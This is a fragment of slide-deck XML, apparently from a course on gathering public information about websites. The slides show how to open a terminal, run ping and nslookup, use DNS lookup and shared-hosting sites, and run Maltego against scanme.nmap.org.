              <a:t>In Linux, Press Ctrl + T / Ctrl + Alt + T </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ ping microsoft.com  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1071" name="Google Shape;1071;p157"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="266888" y="2770950"/>
            <a:ext cx="8673581" cy="1875188"/>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58"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147438" y="439836"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Know IP Address of any website: nslookup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1077" name="Google Shape;1077;p158"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645913"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Terminal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Mac, Press Command+Space, </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="685800" lvl="1" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="93333"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Type Terminal</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>In Linux, Press Ctrl + T / Ctrl + Alt + T </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-247332" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPct val="82352"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>$ nslookup microsoft.com  </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1078" name="Google Shape;1078;p158"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1994588" y="2680913"/>
            <a:ext cx="6457949" cy="2214844"/>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59"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147438" y="439836"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Know IP Address of any website: DNSLookup</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p159"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645913"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Open Browser</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-254000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>https://www.whatismyip.com/dns-lookup/</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1085" name="Google Shape;1085;p159"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5289075" y="1523888"/>
            <a:ext cx="3740624" cy="354682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60"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2147438" y="439836"/>
            <a:ext cx="64581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dk1"/>
              </a:buClr>
              <a:buSzPts val="3000"/>
              <a:buFont typeface="Century Gothic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dedicated IP and Shared Hosting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1091" name="Google Shape;1091;p160"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="351788" y="1354781"/>
            <a:ext cx="3360300" cy="3439500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Some Domains has a range of IP addresses</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Some domains has a unique IP Address.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>Some domains have not a unique IP Address, where multiple website share a single IP and this process is known as shared hosting. </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1500"/>
            </a:br>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-260350" algn="just" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1500"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1500"/>
              <a:t>In order to know, with whom we a are sharing IP there is a website called ip-neighbors.com</a:t>
            </a:r>
            <a:endParaRPr sz="1500"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1092" name="Google Shape;1092;p160"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4140544" y="1409588"/>
            <a:ext cx="4464844" cy="1805100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1093" name="Google Shape;1093;p160"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4176263" y="3280463"/>
            <a:ext cx="4598024" cy="1805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4"/>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1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="276" name="Google Shape;276;p44"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1017725"/>
            <a:ext cx="8260800" cy="3416400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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root@kali:~# maltego scanme.nmap.org</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="1A1A1A"/>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sz="1400">
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="277" name="Google Shape;277;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1017725"/>
            <a:ext cx="9144000" cy="35337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61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Complete information about any website</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1099" name="Google Shape;1099;p161"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77644" y="1621669"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Open Browser</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>https://website.informer.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1100" name="Google Shape;1100;p161"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5167763" y="798750"/>
            <a:ext cx="3387656" cy="4182713"/>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62"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Complete information about any website</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1106" name="Google Shape;1106;p162"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77644" y="1621669"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Open Browser</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>https://website.informer.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1107" name="Google Shape;1107;p162"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5082844" y="679331"/>
            <a:ext cx="3946856" cy="4354987"/>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163"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="800"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2700" b="1">
                <a:latin typeface="Times New Roman"/>
                <a:ea typeface="Times New Roman"/>
                <a:cs typeface="Times New Roman"/>
                <a:sym typeface="Times New Roman"/>
              </a:rPr>
              <a:t>Complete information about any website</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Times New Roman"/>
              <a:ea typeface="Times New Roman"/>
              <a:cs typeface="Times New Roman"/>
              <a:sym typeface="Times New Roman"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1113" name="Google Shape;1113;p163"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="77644" y="1621669"/>
            <a:ext cx="5563200" cy="1035000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="800"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800"/>
              <a:t>Open Browser</a:t>
            </a:r>
            <a:endParaRPr sz="1800"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2800"/>
              <a:t>https://website.informer.com</a:t>
            </a:r>
            <a:endParaRPr sz="1400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1114" name="Google Shape;1114;p163"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5192025" y="739988"/>
            <a:ext cx="3837676" cy="433072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64"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="509494" y="0"/>
            <a:ext cx="8108100" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="ctr" anchorCtr="0">
